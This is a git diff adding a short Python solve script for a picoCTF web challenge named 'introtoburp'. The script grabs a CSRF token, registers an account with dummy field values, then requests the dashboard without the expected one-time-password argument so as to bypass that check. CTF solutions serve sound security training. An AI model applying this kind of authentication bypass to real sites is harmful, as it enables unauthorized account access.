diff --git a/web/introtoburp/solve.py b/web/introtoburp/solve.py new file mode 100755 index 0000000..3b9402d --- /dev/null +++ b/web/introtoburp/solve.py @@ -0,0 +1,35 @@ +#!/usr/bin/env nix-shell +#!nix-shell -p python3 -i python3 python3Packages.requests python3Packages.beautifulsoup4 + +import requests +from bs4 import BeautifulSoup + +BASE_URL = "http://titan.picoctf.net:65280/" + +def main(): + s = requests.Session() + + # Get cookie + csrf + res = s.get(BASE_URL).text + csrf = BeautifulSoup(res, features = 'html.parser').find('input', {'name': 'csrf_token'})['value'] + + res = s.post( + BASE_URL, + data = { + 'csrf_token': csrf, + 'full_name': 'a', + 'username': 'b', + 'phone_number': 'c', + 'city': 'd', + 'password': 'e', + 'submit': 'Register', + }, + ) + + # NOTE: this is broken if it doesn't get the 'otp' argument it expects + res = s.post(BASE_URL + 'dashboard') + print(res) + print(res.text) + +if __name__ == "__main__": + main()